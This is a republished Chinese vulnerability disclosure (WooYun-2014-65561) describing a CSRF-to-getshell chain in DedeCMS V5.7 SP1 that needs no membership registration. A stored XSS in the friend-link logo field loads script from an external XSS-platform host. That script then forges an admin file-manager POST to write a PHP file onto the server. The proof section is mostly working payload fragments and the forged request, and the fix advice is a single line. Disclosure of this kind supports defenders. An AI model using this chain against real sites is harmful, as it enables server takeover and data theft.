DedeCMS csrf getshell 无需会员中心

技术 作者:HackerEye 2018-08-24 09:31:05
  1. 发布时间:2014-06-20
  2. 公开时间:2014-09-18
  3. 漏洞类型:xss
  4. 危害等级:高
  5. 漏洞编号:WooYun-2014-65561
  6. 测试版本:V5.7-UTF8-SP1 20140612

简要描述

最近csrf又火了哈,各种csrf脱裤。dede后台挺方便就直接写getshell了 一直在白盒今天试试黑盒 结果发现了这个问题 不用注册,3条请求getshell

详细说明

在黑盒测试友情链接功能的时候发现filter的一个bug 网站logo处提交">_<'&quot;&lt;&gt;发现后台显示logo时居然成功引入了双引号闭合了src属性。
20005220573ad42b0be55ad91060bb3bcc82d84c.jpg
经过多次测试发现 只要单引号后面跟&quot;就能成功闭合双引号 于是提交测试代码 '&quot; onerror=alert(1);//
20005546dce3e7eab9b1f0d84603123ef563d99b.jpg
成功弹出了alert

漏洞证明

先用xss平台创建一个项目,然后自定义代码这里用的pkav的post get模块
POST **.**.**.**/dede/file_manage_control.php

fmdo=edit&backurl=&activepath=&filename=csrf.php&str=%3C%3Fphp+phpinfo%28%29%3B%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++
因为此处字符长度有限制 所以将payload拆分为3段提交
'&quot; onerror=s.src='http://xss平台/KCfTiA';//
'&quot; onerror=body.appendChild(s);//
'&quot; onerror=s=createElement('script');//
注意显示的顺序与提交的顺序是相反的 所以要把payload顺序倒过来 提交完后访问后台友情链接模块
20010206caafadc21835037c89b4358d34a54357.jpg
可以看到访问了js 然后访问了file_manage_control.php 文件管理可以看到shell已经躺在目录里了
200103478cfd0aeb0a884041ce3a1d0809a25c4c.jpg

修复方案

xss 过滤
作者:索马里的乌贼 链接:https://www.jianshu.com/p/cf801335b39d

关注公众号:拾黑(shiheibook)了解更多

[广告]赞助链接:

四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

公众号 关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接